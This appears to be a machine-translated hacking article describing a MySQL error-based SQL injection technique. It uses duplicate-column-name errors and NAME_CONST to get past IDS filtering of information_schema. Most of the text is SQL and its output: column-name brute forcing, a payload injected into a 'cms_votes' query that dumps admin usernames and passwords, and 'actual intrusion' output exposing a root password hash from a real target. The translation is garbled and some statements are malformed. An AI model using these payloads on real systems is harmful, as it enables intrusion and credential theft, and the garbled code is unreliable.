Original article: bypassing ids to filter information_schema continuous perfusion
// Use mysql to expose fields with errors
Mysql select * from (select * from user ajoin user B) c;
Error 1060 (42s21): duplicate column namehost
Mysql select * from (select * from user ajoin user busing (host) c;
Error 1060 (42s21): duplicate column nameuser
Mysql select * from (select * from user ajoin user busing (host, user) c;
Error 1060 (42s21): duplicate column namepassword
.
// Obtain information
// It may be a version problem. I cannot test it successfully.
Mysql select name_const (select host from user limit 0, 1), 0 );
Error 1210 (hy000): incorrect arguments to name_const
It seems that the name_const parameter must be the same as the const parameter.
Try again next time.
Update: it is clearly a version problem (the parameters in the higher version are all const, or an error is reported). the versatility of this method does not seem very good.
Mysql select version ();
+ --- +
| Version () |
+ --- +
| 5.0.27-community-nt |
+ --- +
1 row in set (0.00 sec)
Mysql select name_const (select user (), 0 );
+ -- +
| Root @ localhost |
+ -- +
| 0 |
+ -- +
1 row in set (0.00 sec)
---
Mysql select version ();
+ -- +
| Version () |
+ -- +
| 5.1.35-community |
+ -- +
1 row in set (0.00 sec)
Mysql select name_const (select version (), 0 );
Error 1210 (hy000): incorrect arguments to name_const
When I was doing penetration, I met a website where ids filtered information_schema. As a result, I failed to solve the problem later. I read the article the day before and found a bypass method. I tested it locally, I also discussed the monthly meeting, and finally constructed the statements with the help of the monthly meeting. At that point, I went back and looked at them, later, when my brother released the method, let's publish it.
1. Construct a local test table
Mysql create table users (id int, name varchar (20), passwd varchar (32 ));
Query OK, 0 rows affected (0.04 sec)
Mysql insert into users value (1, mickey, 827ccb0eea8a706c4c34a16891f84e7b );
Query OK, 1 row affected (0.00 sec)
Mysql create table news (is_admin int (1), id int (2), title varchar (100), date );
Query OK, 0 rows affected (0.00 sec)
Mysql insert into news values (1, 1, hello, mickey, now ());
Query OK, 1 row affected, 1 warning (0.00 sec)
2. Violent column names
Mysql select * from (select * from users as ajoin news as B) as c;
Error 1060 (42s21): duplicate column nameid
Mysql select * from (select * from users ajoin users busing (id) c;
Error 1060 (42s21): duplicate column namename
Mysql select * from (select * from users ajoin users busing (id, name) c;
Error 1060 (42s21): duplicate column namepasswd
Mysql select * from (select * from users ajoin users busing (id, name, passwd) c;
+ -- + --- + ---- +
| Id | name | passwd |
+ -- + --- + ---- +
| 1 | mickey | 827ccb0eea8a706c4c34a16891f84e7b |
+ -- + --- + ---- +
1 row in set (0.00 sec)
Mysql select * from (select * from news ajoin news busing (id) as c;
Error 1060 (42s21): duplicate column nameis_admin
Mysql select * from (select * from news ajoin news busing (id, is_admin) as c;
Error 1060 (42s21): duplicate column nametitle
Mysql select * from (select * from news ajoin news busing (id, is_admin, title) as c;
Error 1060 (42s21): duplicate column namedate
Mysql select * from (select * from news ajoin news busing (id, is_admin, title, date) as c;
+ ---- + -- + --- + -- +
| Is_admin | id | title | date |
+ ---- + -- + --- + -- +
| 1 | 1 | hello, mickey | 2010-05-08 |
+ ---- + -- + --- + -- +
1 row in set (0.00 sec)
3. brute force field value (this statement was created by yuanniu)
Violent statements
Select * from cms_votes where vid = 1 and exists
(Select * from (select name_const (select group_concat (concat (uid, 0x7c, pwd) from admin)
, Fuck) a join (select name_const (select group_concat (concat (uid, 0x7c, pwd) from admin), fuck) B) c );
Application:
Mysql select * from cms_votes where vid = 1 and exists
(Select * from (select name_const (
(Select group_concat (concat (uid, 0x7c, pwd) from admin), fuck) a join (select name_const (select group_concat (concat (uid, 0x7c, pwd )) fromadmin ),
Fuck) B) c );
Error 1060 (42s21): duplicate column nameylbhz | fuck, mickey | fucked
Mysql select * from cms_votes where vid = 1 and exists
(Select * from (select name_const (@ version, 0 ))
A join (select name_const (@ version, 0) B) c );
Error 1060 (42s21): duplicate column name5.0.45-community-nt
4. Actual intrusion Cases
Column name5.0.27-community-nterror: duplicate column name5.0.27-community-nt
Column nameroot * b7b1a4f45d9e638faeb750f0a 99935634cff6c82 ′
Error: duplicate column nameroot * b7b1a4f45d9e638faeb750f0a 99935634cff6c82 ′
Finally, I would like to thank Mo NIU for guiding the participants.